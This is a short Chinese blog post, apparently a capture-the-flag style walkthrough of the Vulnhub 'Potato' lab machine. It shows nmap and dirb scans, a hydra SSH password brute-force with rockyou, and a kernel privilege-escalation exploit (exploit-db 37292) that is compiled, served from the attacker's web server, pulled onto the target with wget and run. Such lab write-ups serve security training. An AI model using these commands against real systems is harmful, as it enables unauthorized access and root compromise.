点击蓝字,关注我们
靶机:Potato
难度:简单
Vulnhub下载:
https://www.vulnhub.com/entry/potato-suncsr-1,556/
公众号回复:Potato (获取国内不限速下载链接)
Nmap扫描当前网段,寻找目标靶机IP
Nmap -sP 192.168.12.1/24
Nmap扫描端口
Nmap -p 1-65535 192.168.12.131
只开放了80,7120端口
Dirb扫描目录
Dirb http://192.168.12.131
发现存在info.php
看了一会没有发现什么利用点,转向一个未知的7120端口
折腾好一会,发现是ssh端口
ssh -p 7120 root@192.168.12.131
直接开始爆破
hydra -l potato -P /usr/share/wordlists/rockyou.txt -vV ssh://192.168.12.131:7120
用户名:potato
密码:letmein
查看内核版本
uname -a
查找相关漏洞
searchsploit ubuntu 3.13.0
第一个符合条件,开始利用
编译exp
gcc /usr/share/exploitdb/exploits/linux/local/37292.c -o exp
开启apache2,将exp放到网站目录下
service apache2 start
cp exp /var/www/html
Wget下载exp
wget http://192.168.12.130/exp
执行exp
得到flag
往期推荐 ·
长按识别二维码关注我们
本文始发于微信公众号(信安小屋):Vulnhub篇Potato
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论